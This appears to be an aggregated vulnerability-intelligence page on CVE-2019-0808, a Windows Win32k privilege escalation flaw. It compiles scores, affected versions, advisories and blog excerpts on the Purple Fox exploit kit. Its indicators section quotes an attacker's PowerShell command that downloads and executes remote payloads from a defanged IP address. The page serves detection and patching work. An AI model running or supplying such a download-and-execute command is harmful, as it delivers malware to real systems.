CVE-2019-0808
Published 2019-04-09
Priority P184 · high · 7.8 · CVSS 3.1
AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability · due 2022-05-03
Exploited in the wild
EPSS: 53.30% (98.9th percentile)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.
Affected
19 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows | — | — |
| microsoft | windows | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server | — | — |
| microsoft | windows_server_2008 | — | — |
| microsoft | windows_server_2012 | — | — |
| msrc | windows_7_for_32-bit_systems_service_pack_1 | — | — |
| msrc | windows_7_for_x64-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_for_32-bit_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_itanium-based_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_for_x64-based_systems_service_pack_2 | — | — |
| msrc | windows_server_2008_r2_for_itanium-based_systems_service_pack_1 | — | — |
| msrc | windows_server_2008_r2_for_x64-based_systems_service_pack_1 | — | — |
Detection & IOCs (extracted from sources)
Command: `cmd.exe /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://103.228.112.246:17881/57BC9B7E.Png');MsiMake hxxp://103.228.112.246:17881/0CFA042F.Png"`
- CVE-2019-0808 exploit binary compiled on 10 September 2020; PDB path reveals it was sourced from a public GitHub repository named CVE-2019-0808
- CVE-2019-0808 is targeted specifically against Windows 7 / Windows Server 2008 systems missing KB4489878, KB4489885, or KB2882822; check for absence of these hotfixes as a detection signal
- Purple Fox payload uses steganography to embed LPE exploit binaries inside image files (key=3 & key=4); detect by inspecting pixel-level LSB encoding in downloaded images combined with IEX execution
- Purple Fox MSI drops a VMProtect-protected DLL; PE section names starting with '.vmp' indicate VMProtect packing and should be flagged during file scanning
- CVE-2019-0808 exploitation in the PurpleFox context targets only Windows 7 / Windows Server 2008 (64-bit); the exploit bundle script checks the OS version before selecting this CVE
- The exploit code for CVE-2019-0808 used by Purple Fox was sourced from a publicly available GitHub repository, meaning the binary may vary across actors who recompile it
CVSS provenance
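| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.8 | HIGH | CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 7.8 | HIGH | — |
| cisa | — | 7.8 | HIGH | — |
| vendor_msrc | — | 7.0 | HIGH | — |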
CISA
Microsoft Win32k Privilege Escalation Vulnerability
cisa·2021-11-03·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Win32k Privilege Escalation Vulnerability
Vulnerability: Microsoft Win32k Privilege Escalation Vulnerability
Affected: Microsoft Win32k
Microsoft Win32k contains a privilege escalation vulnerability due to the component failing to properly handle objects in memory. Successful exploitation allows an attacker to run code in kernel mode.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-0808
Remediation Due Date: 2022-05-03
Microsoft
Win32k Elevation of Privilege Vulnerability
vendor_msrc·2019-03-12·CVSS 7.0
CVE-2019-0808 [HIGH] Win32k Elevation of Privilege Vulnerability
Description: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
To exploit this vulnerability, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.
The update addresses this vulnerability by correcting how Win32k handles objects in memory.
Microsoft Graphics Component: Microsoft Graphics Component
Impact: Elevation of Pri
GHSA
GHSA-8wc3-99q7-2qvc: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2019-0808 [HIGH] GHSA-8wc3-99q7-2qvc: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0797.
GHSA
GHSA-74qg-858w-vpcj: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2019-0797 [HIGH] GHSA-74qg-858w-vpcj: An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2019-0808.
Project0
Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019 - Project Zero
project_zero·2020-07-01
CVE-2016-5195 Detection Deficit: A Year in Review of 0-days Used In-The-Wild in 2019 - Project Zero
Posted by Maddie Stone, Project Zero
In May 2019, Project Zero released our tracking spreadsheet for 0-days used “in the wild” and we started a more focused effort on analyzing and learning from these exploits. This is another way Project Zero is trying to make zero-day hard. This blog post synthesizes many of our efforts and what we’ve seen over the last year. We provide a review of what we can learn from 0-day exploits detected as used in the wild in 2019. In conjunction with this blog post, we are also publishing another blog post today about our root cause analysis work that informed the conclusions in this Year in Review. We are also releasing 8 root cause analyses that we have done for in-the-wild 0-days from 2019.
When I had the idea for this “Year in Review” blog post, I immedi
VulnCheck
Microsoft Win32k Privilege Escalation Vulnerability
vulncheck·2019·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Win32k Privilege Escalation Vulnerability
Microsoft Win32k contains a privilege escalation vulnerability due to the component failing to properly handle objects in memory. Successful exploitation allows an attacker to run code in kernel mode.
Affected: Microsoft Win32k
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2019-Mar; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.niiconsulting.com/Security_Advisories/Security_Advisory_Digest_April_edition_1_digest_pdf.pdf; https://www.sentinelone.com/labs/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/; https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-
No detection rules found.
Exploit-DB
Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
exploitdb·2019-03-26·CVSS 7.8
CVE-2019-0808 [HIGH] Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
Microsoft Windows 7/2008 - 'Win32k' Denial of Service (PoC)
---
# Exploit Title: Microsoft Windows Win32k CVE-2019-0808 Local Privilege Escalation Vulnerability
# Date: 24/03/2019
# Exploit Author: ze0r
# Vendor Homepage: www.microsoft.com
# Version: Microsoft Windows 7/ Server 2008
# CVE : CVE-2019-0808
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46604.zip
Metasploit
Microsoft Windows NtUserMNDragOver Local Privilege Elevation
metasploit
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call. The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not effectively check the validity of the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), where the NULL pointer dereference will occur. This module has been tested against Windows 7 x86 SP0 and SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
PurpleFox Adds New Backdoor That Uses WebSockets
blogs_trendmicro·2021-10-19·CVSS 7.8
CVE-2021-1732 [HIGH] PurpleFox Adds New Backdoor That Uses WebSockets
Cyber Threats
## PurpleFox Adds New Backdoor That Uses WebSockets
In September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a PurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added vulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.
By: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy (Oct 19, 2021)
We also found a new b
Sentinelone
Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
blogs_sentinelone·2020-10-19·CVSS 7.8
CVE-2020-1054 [HIGH] Purple Fox EK | New CVEs, Steganography, and Virtualization Added to Attack Flow - SentinelLabs
## Executive Summary
- In recent weeks, we have seen a spike in the number of attempts to attack vulnerable versions of Internet Explorer by actors leveraging the Purple Fox exploit kit.
- Our investigations reveal that Purple Fox has iterated to include use of two recent CVEs – CVE-2020-1054 and CVE-2019-0808 – through publicly-available exploit code.
- In addition, we’ve noticed other changes to their attack flow that allow them to better circumvent firewall protections and some detection tools by adopting steganography and obscuring malicious code with code virtualization technologies.
During the last couple of years, Purple Fox has advanced its attack and delivery methods. First observed in September 2018, subsequent researchers noted that in 2019 Purple Fox dropped use of NSIS (Null
Tenable
CVE-2020-0674: Internet Explorer Remote Code Execution Vulnerability Exploited in the Wild
blogs_tenable·2020-01-20·CVSS 7.5
[HIGH] CVE-2020-0674: Internet Explorer Remote Code Execution Vulnerability Exploited in the Wild
Tenable
CVE-2019-1367: Critical Internet Explorer Memory Corruption Vulnerability Exploited In The Wild
blogs_tenable·2019-09-23·CVSS 7.5
[HIGH] CVE-2019-1367: Critical Internet Explorer Memory Corruption Vulnerability Exploited In The Wild
Securelist
IT threat evolution Q1 2019. Statistics
blogs_securelist·2019-05-23
Authors
- Victor Chebyshev
- Fedor Sinitsyn
- Denis Parinov
- Boris Larin
- Oleg Kupreev
- Evgeny Lopatin
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.
## Quarterly figures
According to Kaspersky Security Network,
- Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources in 203 countries across the globe.
- 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.
- Attempted infections by malware designed t
Krebs
Patch Tuesday, March 2019 Edition
blogs_krebs·2019-03-13·CVSS 7.8
CVE-2019-0808 [HIGH] Patch Tuesday, March 2019 Edition
Microsoft on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its Windows operating systems, Internet Explorer, Edge, Office and Sharepoint. If you (ab)use Microsoft products, it’s time once again to start thinking about getting your patches on. Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today’s patch batch without any help from users.
Microsoft also addressed a zero day flaw (CVE-2019-0808) in Windows 7 and Windows Server 2008 that’s been abused in conjunction with a previously unknown weakness (CVE-2019-5786) in Google’s Chrome browser. A security alert from Google last week said attackers were chaining the Windows and Chrome vulnerabilities to drop malicious code onto vulnerable systems.
If you use Chro
Krebs
Patch Tuesday, March 2019 Edition
blogs_krebs·2019-03-13·CVSS 7.8
[HIGH] Patch Tuesday, March 2019 Edition
Microsoft on Tuesday pushed out software updates to fix more than five dozen security vulnerabilities in its Windows operating systems, Internet Explorer, Edge, Office and Sharepoint. If you (ab)use Microsoft products, it’s time once again to start thinking about getting your patches on. Malware or bad guys can remotely exploit roughly one-quarter of the flaws fixed in today’s patch batch without any help from users.
One interesting patch from Microsoft this week comes in response to a zero-day vulnerability (CVE-2019-0797) reported by researchers at Kaspersky Lab, who discovered the bug could be (and is being) exploited to install malicious software.
Microsoft also addressed a zero day flaw (CVE-2019-0808) in Windows 7 and Windows Server 2008 that’s been abused in conjunction wit
Tenable
Use-After-Free Vulnerability in Google Chrome Exploited In The Wild (CVE-2019-5786)
blogs_tenable·2019-03-06·CVSS 6.5
[MEDIUM] Use-After-Free Vulnerability in Google Chrome Exploited In The Wild (CVE-2019-5786)
Zscaler
Zscaler found Multiple Security Vulnerabilities | 03-12-201
blogs_zscaler·CVSS 7.5
[HIGH] Zscaler found Multiple Security Vulnerabilities | 03-12-201
- http://packetstormsecurity.com/files/157616/Microsoft-Windows-NtUserMNDragOver-Local-Privilege-Escalation.html
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0808
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-0808
- 2019-04-09: Published
- 2021-11-03: Added to CISA KEV
- Exploited in the wild